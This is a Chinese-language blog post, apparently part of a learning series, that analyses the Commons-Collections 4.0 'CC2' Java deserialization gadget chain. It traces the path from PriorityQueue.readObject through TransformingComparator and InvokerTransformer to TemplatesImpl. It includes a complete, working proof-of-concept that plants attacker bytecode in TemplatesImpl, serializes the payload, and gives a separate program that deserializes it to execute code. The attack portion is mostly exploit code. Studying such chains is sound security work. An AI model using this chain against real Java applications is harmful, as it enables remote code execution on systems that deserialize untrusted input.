当前位置：首页 > news >正文

Commons-Collections篇-CC2链分析

news 2025/7/5 20:56:50

前言

3.1-3.2.1版本中TransformingComparator并没有去实现Serializable接口，是不可以被序列化的，所以我们重新搭建一个4.0的具有漏洞的CC环境
CC2链主要使用的和CC4一样，但是区别在于CC2避免了使用Transformer数组，没有使用InstantiateTransformer类进行初始化，主要分析中间连接部分也就是CC2链重心

1.环境安装

CommonsCollections = 4.0
在pom.xml中加入4.0版本的依赖并加载

<dependencies><!-- https://mvnrepository.com/artifact/commons-collections/commons-collections --><dependency><groupId>org.apache.commons</groupId><artifactId>commons-collections4</artifactId><version>4.0</version></dependency>
</dependencies>

在这里插入图片描述

2. 分析

从链的出口到中间的过程和在CC4中分析的一样，都是从PririPriorityQueuety.heapify()—>Comparator.compare(),执行的命令点也是TemplatesImpl

TemplatesImpl templates = new TemplatesImpl();
Class ca = templates.getClass();
Field name = ca.getDeclaredField("_name");
name.setAccessible(true);
name.set(templates,"admin");Field byteField = ca.getDeclaredField("_bytecodes");
byteField.setAccessible(true);
byte[] evil = Files.readAllBytes(Paths.get("D:\\bianyi\\pycharm\\IDEA\\Projects\\untitled1\\target\\classes\\org\\example\\Calc.class"));
byte[][] codes = {evil};
byteField.set(templates,codes);

就和我们前言中说的一样，CC2相较于CC4是放弃了使用InstantiateTransformer来实例化TrAXFilter，转为直接使用InvokerTransformer去调用templates对象的newTransformer方法，我们写一个InvokerTransformer去调用命令执行

InvokerTransformer test = new InvokerTransformer<>("newTransformer",new Class[]{}, new Object[]{});

创建 TransformingComparator 类对象，传入一个临时的 Transformer 类对象，这是为了让代码能够不提前执行，在反序列化的时候执行。

TransformingComparator transformingComparator = new TransformingComparator<>(new ConstantTransformer<>(1));

我们在CC1中分析过InvokerTransformer类，之前已经写好一个InvokerTransformer调用，但是我们还需要给他传入一个对象，方便它去找到类的对象，并调用指定方法
在这里插入图片描述
所以我们创建 PriorityQueue 类对象传入 transformingComparator 对象，但是此时向队列⾥添加的元素就是我们前⾯创建的 TemplatesImpl 对象了，这是因为最后调用 PriorityQueue.compare() 的时候是传入队列中的两个对象，然后 compare() 中调用 Transformer.transform(obj1) 的时候用的是传入的第一个对象作为参数

再在运行后反射修改回我们要执行的命令

PriorityQueue priorityQueue = new PriorityQueue(transformingComparator);
priorityQueue.add(templates);
priorityQueue.add(templates);Class c = transformingComparator.getClass();
Field transformingField = c.getDeclaredField("transformer");
transformingField.setAccessible(true);
transformingField.set(transformingComparator, test);

3.POC编写

package org.example;import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.PriorityQueue;public class CC2 {public static void main(String[] args) throws Exception {TemplatesImpl templates = new TemplatesImpl();Class ca = templates.getClass();Field name = ca.getDeclaredField("_name");name.setAccessible(true);name.set(templates,"admin");Field byteField = ca.getDeclaredField("_bytecodes");byteField.setAccessible(true);byte[] evil = Files.readAllBytes(Paths.get("D:\\bianyi\\pycharm\\IDEA\\Projects\\untitled1\\target\\classes\\org\\example\\Calc.class"));byte[][] codes = {evil};byteField.set(templates,codes);InvokerTransformer test = new InvokerTransformer<>("newTransformer",new Class[]{}, new Object[]{});TransformingComparator transformingComparator = new TransformingComparator<>(new ConstantTransformer<>(1));PriorityQueue priorityQueue = new PriorityQueue(transformingComparator);priorityQueue.add(templates);priorityQueue.add(templates);Class c = transformingComparator.getClass();Field transformingField = c.getDeclaredField("transformer");transformingField.setAccessible(true);transformingField.set(transformingComparator, test);serializable(priorityQueue);
//
//        unserializable();}private static  Object unserializable() throws Exception, IOException, ClassNotFoundException{FileInputStream fis = new FileInputStream("obj");ObjectInputStream ois = new ObjectInputStream(fis);Object o = ois.readObject();return o;}private static void serializable(Object o) throws IOException, ClassNotFoundException{FileOutputStream fos = new FileOutputStream("obj");ObjectOutputStream os = new ObjectOutputStream(fos);os.writeObject(o);os.close();}}

反序列化运行我们生成的二进制文件

package org.example;import java.io.FileInputStream;
import java.io.IOException;
import java.io.ObjectInputStream;public class Main {public static void main(String[] args) throws Exception {//命令执行代码unserializable();}private static  Object unserializable() throws Exception, IOException, ClassNotFoundException{FileInputStream fis = new FileInputStream("obj");ObjectInputStream ois = new ObjectInputStream(fis);Object o = ois.readObject();return o;}}

我们查看其中的过程
在执行到compare方法时，是TransformingComparator
在这里插入图片描述
到达transform方法时，就是我们之前之前添加priorityQueue.add(templates)的原因了，我们可以看到执行的是相当于

new InvokerTransformer<>("newTransformer",new Class[]{}, new Object[]{}).transform(new TemplatesImpl())

在这里插入图片描述
最后执行成功

本次整体路线为

PriorityQueue.readObject()PririPriorityQueuety.heapify()PririPriorityQueuety.siftDown()PririPriorityQueuety.siftDownUsingComparator()Comparator.compare()InvokerTransformer.transform()TemplatesImpl.newTransformer()definclass -> newInstance()

本系列历史文章

反序列化之路-URLDNS

Commons-Collections篇-CC1链小白基础分析学习

CC1链补充-LazyMap

Commons-Collections篇-CC3链

Commons-Collections篇-CC4链分析

Commons-Collections篇-CC6链分析

Commons-Collections篇-CC2链分析

前言

1.环境安装

2. 分析

3.POC编写

本系列历史文章

相关文章：

Commons-Collections篇-CC2链分析

LeetCode 48.旋转图像

Navicat导入json文件（json文件数据导入到MySQL表中）

避雷！又6本期刊被On Hold！ELSEVIER旗下影响因子高达10+SSCI上榜

CSS 列表样式（ul）全面解析

Python 库PySpark，一个超级强大的数据处理引擎

UE4_材质_雨滴涟漪效果ripple effect_ben教程

mac免费的ntfs软件哪个好 MAC读取NTFS硬盘格式

轻兔推荐 —— who.cx

建筑幕墙甲级设计资质：申请条件与评分标准

easy-es Map类型字段序列化问题：Unexpected character (‘n‘ (code 110)):

[Vue3：组件通信）子组件props接收和watch监听，emit发送父组件 (添加修改设置成绩，添加、删除选课记录）

【网络协议栈】IGMP

Python机器学习完整流程：从数据清洗到推理落地

App上架和推广前的准备

一季度直播6000场，同比增长60%，遥望科技透露重要信息

电商API接口是什么意思？有什么作用？

Python爬虫实战案例之——MySql数据入库

游戏中插入音效

Redis缓存设计之常见问题及解决方案

Spark 之入门讲解详细版（1）

React Native 开发环境搭建（全平台详解）

MongoDB学习和应用(高效的非关系型数据库)

Swift 协议扩展精进之路：解决 CoreData 托管实体子类的类型不匹配问题（下）

React19源码系列之事件插件系统

关于 WASM：1. WASM 基础原理

聊一聊接口测试的意义有哪些？

AI书签管理工具开发全记录（十九）：嵌入资源处理

Mobile ALOHA全身模仿学习

CSS设置元素的宽度根据其内容自动调整